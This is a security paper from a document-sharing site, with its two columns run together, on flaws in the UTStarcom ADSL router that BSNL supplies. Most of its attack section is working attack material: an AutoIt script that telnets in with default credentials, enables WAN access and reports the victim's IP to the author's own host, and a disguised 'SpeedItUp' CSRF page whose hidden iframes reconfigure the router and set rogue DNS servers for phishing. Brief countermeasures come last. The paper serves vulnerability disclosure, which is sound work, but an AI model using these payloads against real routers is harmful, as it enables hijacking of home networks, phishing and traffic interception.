Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

pwning-bsnl

VIEWS: 43 PAGES: 10

									              Pwning the BSNL Users
SathyaPrakash.K aka Boris                 Varun.V
Sathyaprakash222@gmail.com                varun89.malar@gmail.com
www.boris-info.co.cc                      www.boris-info.co.cc
PanimalarEngineeringCollege,Chennai      PanimalarEngineeringCollege,Chennai
India                                    India

Abstract:
       The most common home              2.Protection mechanisms:
ADSL Modem cum Router which                  The standard so called protection
India's No 1 ISP uses is this UT-        mechanisms buit into the router are as
STARCOM                                  follows
product(UT300R2U).The router’s                            1.Remote HTTP
embedded server has several flaws        acess is blocked by default,which was
which makes it vulnerable,               once a famous vulnerability [2]
The flaws upon exploitation gives                         2.Access control
admin access to the router over          determines which privilege should be
WAN ,Wireless router products of         given to which user groups,thereby
this company are also affected by        preventing USER from accessing
this vulnerability.Possible attacks on   ADMIN functions.
compromised routers are Denial of
Service attacks,Remote                   3.Vulnerability Description:
Sniffing,Phishing etc..
Affected Firmware versions UT300R2U
series Software version
                                         3.1 Poor user Validation:
3.08.BSNL_02.01.02_tr64                         The modem has 3 inbuilt users
3.12L.BSNL_01.A2pB023K.d20K_rc2 and                        1.admin
more. We propose some                                      2.user
countermeasures techniques to defeat                       3.support (non-
these kinds of attacks.                  existant)

                                         these accounts have their respective
1.UT-STARCOM:                            usernames as default password.
     The US based company whose             Usually most of the home users
modem cum router which is                don't change the default ADMIN
distributed by BSNL[1] runs a server     password.But some smart users do
on its hardware which is prone to        so,but they aren't really smart enough
several exploits.                        to find what are the user accounts
The main failure of the server lies in   present in their ADSL
its Access control mechanisms,which      Modem+Router..
is improperly sanitized.                 When a user logs in to the modem as
ADMIN he has full access to the           USER in a telnet session.
router,whereas when logged in as a
limited USER ,the user could not
modify any settings on the                4. Proof of Concept:
router.This is the protection                Lets have a look at the source code
mechanism implemented by the              of the javascript which handles the
manufacuter.                              privilege of access mechanism

3.1.1User Privileges:
                                          menuBCM.js:
     The Privilege of access is not at      function menuAdmin(options) { //
all being controlled,simple               All the options are displayed for
javacript(menuBCM.js) handles the         ADMIN
privilage of access mechanism.               var std =
menuBCM.js does nothing but just          options[MENU_OPTION_STANDAR
hides specific menus to USER &            D];
shows everything to the ADMIN.This           var proto =
is insecure,since when the path of a      options[MENU_OPTION_PROTOC
menu is known anyone(USER) could          OL];
request the server to get the page and       var firewall =
indiscriminate of privileges the server   options[MENU_OPTION_FIREWAL
replies them with the result.             L];
                                             var nat =
3.1.2 Passwords:                          options[MENU_OPTION_NAT];
The poor implementation of the               var ipExt =
server is shown from the                  options[MENU_OPTION_IP_EXTE
password.html page.This page is           NSION];
called by the ADMIN user while               var wireless =
changing the passwords for                options[MENU_OPTION_WIRELES
users.This page has the passwords of      S];
the users in clear text for the use of       var voice =
javascript to validate change of          options[MENU_OPTION_VOICE];
passwords                                    var snmp =
                                          options[MENU_OPTION_SNMP];
3.2 Telnet Service:                          var ddnsd =
          Since i had mentioned           options[MENU_OPTION_DDNSD];
earlier that the privilege of user           var sntp =
access is not at all being controlled &   options[MENU_OPTION_SNTP];
javascripts does it by hiding the         .
menus ,It is obvious that a javascript    .
has nothing to do in a telnet session,    if ( user == 'admin' ) //this piece of
hence ADMIN access is given for a         code calls the respective menu to be
displayed
    menuAdmin(options);
  else if ( user == 'support' )         Accessing the password page
    menuSupport(options);               in USER mode of Privilege:
  else if ( user == 'user' )                             Navigating
    menuUser();                         /password.html
}
-------------code truncated

Each menu is assigned to a variable
& respective set of menu’s are called
depending on the user logged in.


Accessing the router as
ADMIN:



                                        Source code of
                                        password.html

                                        <script language="javascript">
                                        <!-- hide

                                           pwdAdmin = 'lame'; //Passwords
                                        for all users are passed in plaintext
                                        for comparing
Accessing the router as                   pwdSupport = 'support';
USER:                                     pwdUser = 'user';
                                          function btnApply() {
                                         var loc = 'password.cgi?';
                                         with ( document.forms[0] ) {
                                          var idx = userName.selectedIndex;

                                          switch ( idx ) {
                                              case 0:
                                                alert("No username is
                                        selected.");
                                                return;
                                              case 1:
        if ( pwdOld.value ==                5.Compromising the Router:
pwdAdmin )
           break;                           From the above analysis we had
        else {                              determined that the entry point into
           alert("Old admin password        the router is through the default
is wrong.");                                passwords & as none is concerned
           return;                          about the USER account
        }
      case 2:
                                             5.1. Malware
        if ( pwdOld.value ==
pwdSupport )
                                            The default ipaddress for the
           break;
                                            UTSTARCOM ADSL Router is
        else {
                                            192.168.1.1 however if the default
           alert("Old support
                                            address is changed we could
password is wrong.");
                                            enumerate it with few lines of extra
     -------------------------- truncated
                                            codes to the malware.
Passwords in plain text are used to
                                            The task of the malware is to telnet
compare with the user entered ones
                                            into the router of the victim using
while changing old passwords
                                            user:user combination and to enable
Telnet Access:                              the WAN-http access on the router &
       while connecting through             log his external ipaddress to the
telnet USER is given ADMIN access           attacker.Now the attacker could just
is given                                    navigate to the ipaddress from his
                                            logs and he will be greeted by the
                                            victim’s router (considering port 80
                                            on WAN is not forwaded).Now using
                                            the user:user combination the attacker
                                            can login into the victim’s router and
                                            by navigating to /passwords.html
                                            page admin password could be
                                            obtained.
                                            Here is my custom script in autoIT[3]
                                            doing the job
                                            Bjacker V 1.0
                                            #include <IE.au3>
                                            $oIE = _IECreate
                                            ("www.boris222.0fees.net/ip.php")
                                            _IENavigate ($oIE,
                                            "www.boris222.0fees.net/ip.php");
                                            Run ("telnet.exe 192.168.1.1 ")
                                            Sleep(1000)
Send("user")                             Bjacking V 1.1:
Send("{ENTER}")
Sleep(1000)
                                         This is a advanced and most
Send("user")
                                         dangerous method of attack, Yes it is
Send("{ENTER}")
                                         true when a BSNL
Send("remoteaccess enable --service
                                         user with a UTSTARCOM
http")
                                         Router/Modem visits a webpage he
Send("{ENTER}")
                                         gets his router
Sleep(3000)
                                         compromised.
Send("logout")
                                         This feature combines CSRF to log
Send("{ENTER}")
                                         into the router and change the remote
ProcessClose("telnet.exe")
                                         access
                                         configuration, and it calls the
                                         iplogger to log the victim ip ; The
http://attacker.net/ip.php
                                         entire process happening
                                         inside is hidden by a IFRAME,
has a script which logs the ipaddress
                                         however modernday browsers with
of the victim in the mysql database
                                         BEAP would ask the
server of the attacker.
                                         user for conformation to loginto
While compiling this script into an
                                         192.168.1.1 , which could be
exe by specifying the necessary
                                         bypassed by social
parameters the executable could be
                                         engineering
run in hidden mode.
                                         index.html
remoteaccess enable --service http
                                         <html>
                                         <head>
This command enables http access to
                                         <title>SpeedItUp</title>
the device through the WAN.
                                         </head>
                                         <body>
 5.2. Web way(CSRF)                      <br><h1>This page configures your
                                         system to use high speed internet,
  This method uses the Cross site        please wait for
request forgery attacks[4] to loginto    few seconds for the script to
the victim’s router and utilizing        configure</h1></br>
iframes to do necessary configuration    Please click the button to continue.
changes on the router in a hidden        <iframe src ="config.html" width=70
manner.                                  marginwidth="25%" height=20
With latest browsers having BEAP         scrolling="no" frameborder="0"
protection enabled some strong social    class="iframe"></iframe>
engineering skills are needed to carry   </body>
out this attack successfully.            </html>
config.html

<html>
<body
onload="window.scrollTo(1440,
980);">
<iframe
src="http://user:user@192.168.1.1/s
csrvcntr.cmd?
action=save&http=1&http=3&icm
p=1&snmp=1&snmp=3&telnet=1&
telnet=3&tftp=2&tftp
=0"
width=3000 height=1000
frameborder=0></iframe>
<iframe
src="http://www.boris222.0fees.net/
ip.php"
width=3000 height=1000
frameborder=0></iframe>               6. Possible Attacks:
</body>
</html>                               6.1.Denial of Service:
                                      1.The attacker might implement
http://user:user@192.168.1.1/scsrv
                                      MAC filtering or other IP restriction
cntr.cmd?
                                      on the victim’s router.
action=save&http=1&http=3&icm
                                      2.Specifying a unreachable Static
p=1&snmp=1&snmp=3&telnet=1&           Route
telnet=3&tftp=2&tftp
                                      3.Killing the httpd server process of
=0
                                      the router repeatedly by telneting
This enables http access on the WAN
                                      into the victim’s router.
and
http://www.boris222.0fees.net/ip.ph
p logs the ipaddress                  5.2.Sniffing:

Exploit in Action:                    1.The attacker could specify a static
                                      route passing through his network for
                                      the victim’s router and sniff the
                                      traffic from the victim.

                                      5.3.Phishing:

                                      PoC:
This is the attack of our special          Normal Operation:
interest as it is one of the stealthiest
attack when combined with routing
attacks.
The attacker could specify a fake
DNS server for the victim router and
could carry out phishing attacks.

http://192.168.1.1/dnscfg.cgi?dnsPri
mary=4.1.1.1&dnsSecondary=2.1.2.3
&dnsDynamic=0&dnsRefresh=1

This changes the primary &
secondary DNS servers of the
victim’s router                            The router has a default DNS server
                                           assigned by the ISP.Some times it
                                           may be provided by a DHCP server.


                                           index.html

                                           <html>
                                           <head>
                                           <title>SpeedItUp</title>
                                           </head>
                                           <body>
Victim’s Network Layout:                   <br><h1>This page configures your
                                           system to use high speed internet,
                                           please wait for
                                           few seconds for the script to
                                           configure</h1></br>
                                           Please click the button to continue.
                                           <iframe src ="config.html" width=70
                                           marginwidth="25%" height=20
                                           scrolling="no" frameborder="0"
                                           class="iframe"></iframe>
                                           </body>
                                           </html>

                                           config.html
This is a normal (usual ) network
setup of a home user.
<html>                                 attacker phishes all the famaous sites
<body                                  (E-MAIL,NETBANKING,SOCIAL
onload="window.scrollTo(1440,          NETWORKING etc)
980);">                                Some advanced users might wonder
<iframe                                about the ssl (https) for them there
src="http://user:user@192.168.1.1/     comes the routing attack.
dnscfg.cgi?dnsPrimary=113.21.12.31     By specifying a static route through
&dnsSecondary=113.21.12.31&dnsD        the attacker’s network MITM attacks
ynamic=0&dnsRefresh=1”                 can be carried out.Using SSL Strip[5]
width=3000 height=1000                 does the job for advanced users.
frameborder=0></iframe>
</body>                                Statistics[6]:
</html>                                And this is the statisctics for number
                                       of BSNL users,Most of the
The above script changes the primary   NorthIndian
& secondary dns servers as specified   BSNL clients are provided with
by the attacker.                       Huawei modem cum routers and they
                                       are not affected by
                                       this vulnerability( I haven't reviewed
                                       it) and remaining are given with this
                                       UTStarcom
                                       product,so nearly 20% of Indian
                                       Internet users are vulnerable to this
                                       exploit.




Attack Scenario:




The DNS server specified by the
Solution:

    Temp:        Change the default password for ADMIN and USER group of
users.As the default User:User combination makes the attacker to intrude into the
router


Permenent:
Get ridden of those nasty javascripts,implement the access control using serverside
scripts storing cookies,As access control using clientside scripting is completly
ridiculous,as the client could do anything.

Last but not the least “Don’t give Dumb Instructions[7] for the HOME
USER’S on configuring the device”
References:
[1] http://investorrelations.utstar.com/releasedetail.cfm?ReleaseID=282468
[2] http://www.thinkdigit.com/forum/archive/index.php/t-57773.html
[3] http://www.autoitscript.com/autoit3
[4]http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
[5]http://www.thoughtcrime.org/software/sslstrip/
[6]http://pcworld.in/india/features/5931689/PDAs__Cell_Phones/Broadbcn
d_Awards_2009
[7] http://www.chennai.bsnl.co.in/BBS/Wireless/WirelessSecurity.htm
Special Thanks to:
 http://www.hak5.org/
 http://www.underground-systems.org/
 http://haktstudios.com/
 http://www.garage4hackers.com/

								
To top